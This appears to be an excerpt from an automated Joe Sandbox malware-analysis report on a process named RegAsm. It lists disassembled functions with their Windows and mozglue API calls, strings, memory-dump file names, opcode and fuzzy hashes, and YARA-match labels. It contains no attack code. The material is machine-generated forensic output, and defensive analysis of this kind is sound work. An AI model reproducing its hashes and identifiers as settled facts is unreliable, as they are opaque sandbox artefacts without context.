                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentmemcpystd::_
                                                                                    • String ID: string too long
                                                                                    • API String ID: 1835169507-2556327735
                                                                                    • Opcode ID: 1ae9b9da084d651e158c9e0c2e379de5b2550a5b38189eb17f699b20abe3d51a
                                                                                    • Instruction ID: 7a39a1a5c8fbacd7e86885b53ed3bafa5cc60d979cb7bbd29f82b024e86b4f4c
                                                                                    • Opcode Fuzzy Hash: 1ae9b9da084d651e158c9e0c2e379de5b2550a5b38189eb17f699b20abe3d51a
                                                                                    • Instruction Fuzzy Hash: 2E110B313006109BDB349F6EC940A6BB7A9EF41754B10093FF443AB2C1CBBADC198799
                                                                                    Function 6CC73CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC73D19
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6CC73D6C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errnomozalloc_abort
                                                                                    • String ID: d
                                                                                    • API String ID: 3471241338-2564639436
                                                                                    • Opcode ID: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                                    • Instruction ID: 59cc09f05beffdbb9a0374653c439a6db4443a2522b4601e42e9718ab6cda2e4
                                                                                    • Opcode Fuzzy Hash: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                                    • Instruction Fuzzy Hash: 6711E335E14688DBDB109BADD9184EDB775EFA6318B48835DEC459B602FB30A9C4C3A0
                                                                                    Function 0040DC98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DCAE
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                    • memmove.MSVCRT ref: 0040DCE7
                                                                                    Strings
                                                                                    • invalid string position, xrefs: 0040DCA9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                    • String ID: invalid string position
                                                                                    • API String ID: 1659287814-1799206989
                                                                                    • Opcode ID: 4a1db7a488beeb9f908306aacd7161d702cd3711e09a625ffb280565243ba0c9
                                                                                    • Instruction ID: 235d2ce02eed8d2983700853ca5430fea27ca4b9fac46b4ff53fa2342e4b86af
                                                                                    • Opcode Fuzzy Hash: 4a1db7a488beeb9f908306aacd7161d702cd3711e09a625ffb280565243ba0c9
                                                                                    • Instruction Fuzzy Hash: 3401B9317042145BE7249E98DD80957B7A6EF85710720493ED44297385DAB8EC4AD398
                                                                                    Function 6CC44730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetNtLoaderAPI
                                                                                    • API String ID: 1646373207-1628273567
                                                                                    • Opcode ID: 9739b3c3b9c34c6b8508ae37254be2f2f2c8b9250847a395cb2819cd14a673ca
                                                                                    • Instruction ID: 0d0b0325f667d34a19ef1581cd932b4c2e2827235047b24edfb6c83d397035c1
                                                                                    • Opcode Fuzzy Hash: 9739b3c3b9c34c6b8508ae37254be2f2f2c8b9250847a395cb2819cd14a673ca
                                                                                    • Instruction Fuzzy Hash: 7801B1793002549FDF049FAAC88461D7BF9FB8B311B158069E905C7310EB74E802CFA6
                                                                                    Function 6CC96DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC96E22
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC96E3F
                                                                                    Strings
                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC96E1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footergetenv
                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                    • API String ID: 1472356752-1153589363
                                                                                    • Opcode ID: 4907150013b7fc4b00baad695dcff81ef010fc59abd9fee6b10eeedbb58e756f
                                                                                    • Instruction ID: a4f688afb900f977fe161ac2993a8c0edd2871542622187077287f70f40ca24e
                                                                                    • Opcode Fuzzy Hash: 4907150013b7fc4b00baad695dcff81ef010fc59abd9fee6b10eeedbb58e756f
                                                                                    • Instruction Fuzzy Hash: E5F02E3C208642CFDA008BECC990A823372A793218F0401A5CC4086FA1F770E906CAEB
                                                                                    Function 6CC49E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49EEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: Infinity$NaN
                                                                                    • API String ID: 1385522511-4285296124
                                                                                    • Opcode ID: 993fb1a65b0747ff0fc3f787f5c7391251036d69caf5bad3438122cd62058254
                                                                                    • Instruction ID: efc1bf6c3d9d8937db2fadcef62aa9df98f14f5c9ed646079593f7db12da6dbc
                                                                                    • Opcode Fuzzy Hash: 993fb1a65b0747ff0fc3f787f5c7391251036d69caf5bad3438122cd62058254
                                                                                    • Instruction Fuzzy Hash: EDF0497D640641CEDB008FF9EA4AB923371B787319F208A99C6041BB40F7B56646CB8A
                                                                                    Function 6CC4BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC4BEE3
                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC4BEF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                    • String ID: cryptbase.dll
                                                                                    • API String ID: 4137859361-1262567842
                                                                                    • Opcode ID: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                                    • Instruction ID: 011b58f92c8a1e79a370ef0226780a45d1fec940691ca01229a66f85911a1f9a
                                                                                    • Opcode Fuzzy Hash: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                                    • Instruction Fuzzy Hash: D0D022322C4A48EBCB00ABE08C2AF2D3BB8A712325F10C020F30594CA1E7B0A410CF98
                                                                                    Function 6CC350E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC3510A
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC35167
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6CC35196
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C), ref: 6CC35234
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                    • Instruction ID: 68aaadce41f194fe15c1618fa8afda310899862de40645545528940ef4927389
                                                                                    • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                    • Instruction Fuzzy Hash: 6C919D75505626CFCB14CF08D490A56BBB1FF89318B298688DC599B715E772FC82CBE0
                                                                                    Function 6CC708F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70918
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC709A6
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC,?,00000000), ref: 6CC709F3
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70ACB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    • Opcode ID: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                                    • Instruction ID: 78a44644e9a296e125ba38fd93488956ac760f5d61c2897166dde20c251322e3
                                                                                    • Opcode Fuzzy Hash: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                                    • Instruction Fuzzy Hash: 44514A367016508FEF149AAAC49462673B1FBC2B34B25817ED865A7F80F732E84187E4
                                                                                    Function 6CC8B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B628
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B67D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B708
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC8B127,?,?,?,?,?,?,?,?), ref: 6CC8B74D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                                    • Instruction ID: bbcee1d273a83f657d9933ef574e51e4c8dfb50bcfe507a3e12f772b2dac7e34
                                                                                    • Opcode Fuzzy Hash: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                                    • Instruction Fuzzy Hash: 9251CD71A067168BDF18CF58C9A066FBBB1FF45308F55852DD85AAB710EB31E804CBA1
                                                                                    Function 6CC8DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC7FF2A), ref: 6CC8DFFD
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E04A
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E0C0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC7FF2A), ref: 6CC8E0FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                                    • Instruction ID: 01a554ee563d53cbded722171d6f67002b4da27a42a3332fcc1752bbea3c1e37
                                                                                    • Opcode Fuzzy Hash: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                                    • Instruction Fuzzy Hash: 5741AFB96062168BEB14CF68D88035B7BB6BB4630CF24493DD516DB740F732E906CB92
                                                                                    Function 6CC86E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC86EAB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC86EFA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC86F1E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86F5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    • Opcode ID: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                                    • Instruction ID: f92bda0adf23ef619728820f18ed3dfedfdd264b6541c3692d680f90dc29fac6
                                                                                    • Opcode Fuzzy Hash: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                                    • Instruction Fuzzy Hash: A831F471A21A0A8FDB04CF2CD941AAB77E9BB85308F504139D41AC7651FB31E55987A0
                                                                                    Function 6CC9B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B5EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B623
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B66C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B67F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$free
                                                                                    • String ID:
                                                                                    • API String ID: 1480856625-0
                                                                                    • Opcode ID: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                                    • Instruction ID: 6f6460a7818f944e815297a6f9d8ae038752eea0be424160601919ecc5d8875f
                                                                                    • Opcode Fuzzy Hash: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                                    • Instruction Fuzzy Hash: B2312771A002169FDB28CF59C85465ABBF5FF81304F16852AD806DB311EB31F915CBE0
                                                                                    Function 6CC6F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F611
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F623
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F652
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F668
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction ID: 9062c10da60e88d4b4e8d0efcbe617984d9e0f302326ccdef4ce1be6516e5483
                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction Fuzzy Hash: C5315E71A00214AFC714CF5ACDC4A9A77B5FB84354B14853DEA4A8BF04E632ED458B90
                                                                                    Function 6CC826B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0
                                                                                    • Opcode ID: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                                    • Instruction ID: e82d43d1b88df88e19c19fe44e6bc361e2469cdf266f84fc3f60822f2c328e32
                                                                                    • Opcode Fuzzy Hash: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                                    • Instruction Fuzzy Hash: DDF0F9B27022005BEB009A58E88C947B7B9EF4121CB500035FA16C3B01F331F929C6A5